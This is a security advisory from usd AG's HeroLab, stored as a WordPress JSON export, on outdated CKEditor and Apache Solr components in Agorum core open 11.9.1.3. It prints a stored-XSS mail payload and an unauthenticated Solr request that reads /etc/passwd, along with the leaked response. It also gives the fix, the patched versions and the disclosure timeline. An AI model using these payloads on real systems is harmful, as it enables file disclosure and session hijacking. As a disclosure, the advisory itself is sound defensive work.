{"id":24280,"date":"2025-06-27T16:08:44","date_gmt":"2025-06-27T14:08:44","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0029\/"},"modified":"2025-07-01T10:29:55","modified_gmt":"2025-07-01T08:29:55","slug":"usd-2025-0029","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0029\/","title":{"rendered":"usd-2025-0029"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-0029 | Agorum core open 11.9.1.3-1857 - Dependency on Vulnerable Third-Party Component<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Agorum core open<br \/><strong>Affected Version<\/strong>: 11.9.1.3-1857<br \/><strong>Vulnerability Type<\/strong>: Dependency on Vulnerable Third-Party Component (CWE-1395)<br \/><strong>Security Risk<\/strong>: Critical<br \/><strong>Vendor<\/strong>: Agorum<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.agorum.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.agorum.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: Requested<br \/><strong>CVE Link<\/strong>: Requested<br \/><strong>Advisory ID<\/strong>: usd-2025-0029<\/p>\n<h3>Description<\/h3>\n<p>A<!-- add a description of the application and vulnerability -->gorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><!-- describe how the vulnerability can be exploited, feel free to add supporting images etc. -->The application depends on third-party components that contain known and exploitable vulnerabilities.<br \/>Below are two examples of such vulnerable components, each with known public CVEs and documented exploit paths.<\/p>\n<p><strong>CKEditor 4.6.2 - CVE-2024-24816<\/strong><\/p>\n<p>CKEditor 4 &lt; 4.24.0-lts - XSS vulnerability in samples that use the \"preview\" feature.<br \/><a href=\"https:\/\/github.com\/afine-com\/CVE-2024-24816\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/afine-com\/CVE-2024-24816<\/a><\/p>\n<p>Agroum core integrates CKEditor for its built-in mail functionality, which introduces a potential privilege escalation risk. A low-privileged user could craft an email containing malicious JavaScript and send it to an administrative user. If the administrative user opens the email, the embedded JavaScript will execute within the context of their browser session.<\/p>\n<p>The following payload can be used to craft a malicious mail:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">p<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"ni\" style=\"background: #263238;color: #89ddff\">&amp;gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">p<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">p<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">a<\/span> <span class=\"na\" style=\"background: #263238;color: #bb80b3\">href<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"javascript:alert(document.domain)\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span>XSS<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">a<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">p<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">p<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"ni\" style=\"background: #263238;color: #89ddff\">&amp;nbsp;<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">p<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><\/pre>\n<\/div>\n<p><strong>Apache Solr 7.7.2 - Arbitrary File Read<\/strong><\/p>\n<p>The application uses an outdated version of Apache Solr, which contains several known vulnerabilities. Additionally, Apache Solr is configured to allow unauthenticated access.<br \/>For instance, an unauthenticated attacker could gain access to arbitrary system files by sending the following request to the Apache Solr server:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/solr\/agorumsolr01_shard1_replica_n1\/debug\/dump?stream.url=file:\/\/\/etc\/passwd&amp;param=ContentStream<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost:8981<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p>The response reveals the content of <strong>\/etc\/passwd<\/strong>, as shown below:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json;charset=utf-8<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">4123<br \/><\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"responseHeader\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:{<\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <br \/><\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">    \"status\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"QTime\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"handler\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"org.apache.solr.handler.DumpRequestHandler\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"params\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"param\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"ContentStream\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"stream.url\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"file:\/\/\/etc\/passwd\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}},<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"params\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"stream.url\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"file:\/\/\/etc\/passwd\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"echoHandler\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"true\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"param\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"ContentStream\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"echoParams\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"explicit\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">},<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"streams\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:[{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"name\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"sourceInfo\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"url\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"size\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"contentType\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"stream\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">\"root:x:0:0:root:\/root:\/usr\/bin\/zsh<\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p>These two exploits serve as simple demonstrations of how outdated components can be leveraged for immediate attacks. However, the core issue lies in the use of outdated third-party libraries, which inherently expose the application to numerous known vulnerabilities. Addressing these outdated dependencies is crucial to mitigating a wide range of potential threats beyond just these examples.<\/p>\n<h3>Fix<\/h3>\n<p><!-- how the vendor can fix the vulnerability.--><br \/><!-- if you recommended a quick workaround to the customer (and they are fine with you including it here!) feel free to add this information as well -->It is essential to regularly update and patch third-party components and libraries. This includes performing vulnerability assessments to identify outdated or unsupported dependencies, and replacing them with secure, up-to-date versions. Implementing automated tools for dependency management, such as dependency checkers or vulnerability scanners, can help proactively identify and address these issues. Additionally, consider using Software Bill of Materials (SBOM) to track and audit all third-party components and their versions in use.<\/p>\n<p>&nbsp;<\/p>\n<p>Users of agorum core open can upgrade to 11.9.2 or 11.10.1.<\/p>\n<h3>References<\/h3>\n<p><!-- add references to the application and vulnerability.--><\/p>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/1395.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/1395.html<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-05-05<\/strong>: First contact request via mail.<\/li>\n<li><strong>2025-05-05<\/strong>: The vendor has confirmed the delivery and has begun investigating the matter.<\/li>\n<li><strong>2025-05-07<\/strong>: The vendor has begun addressing and fixing the issue.<\/li>\n<li><strong>2025-05-15<\/strong>: The vendor has addressed and fixed the vulnerability within the cloud instances.<\/li>\n<li><strong>2025-05-30<\/strong>: The vendor released fixed versions 11.9.2 and 11.10.1.<\/li>\n<li><strong>2025-06-27<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><!-- add the names of the persons that discovered the vulnerability. This information will be sent to the vendor and published on the HeroLab blog -->This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-0029 | Agorum core open 11.9.1.3-1857 - Dependency on Vulnerable Third-Party Component Product: Agorum core openAffected Version: 11.9.1.3-1857Vulnerability Type: Dependency on Vulnerable Third-Party Component (CWE-1395)Security Risk: CriticalVendor: AgorumVendor URL: https:\/\/www.agorum.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: RequestedCVE Link: RequestedAdvisory ID: usd-2025-0029 Description Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24280","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24280"}],"version-history":[{"count":3,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24280\/revisions"}],"predecessor-version":[{"id":24283,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24280\/revisions\/24283"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}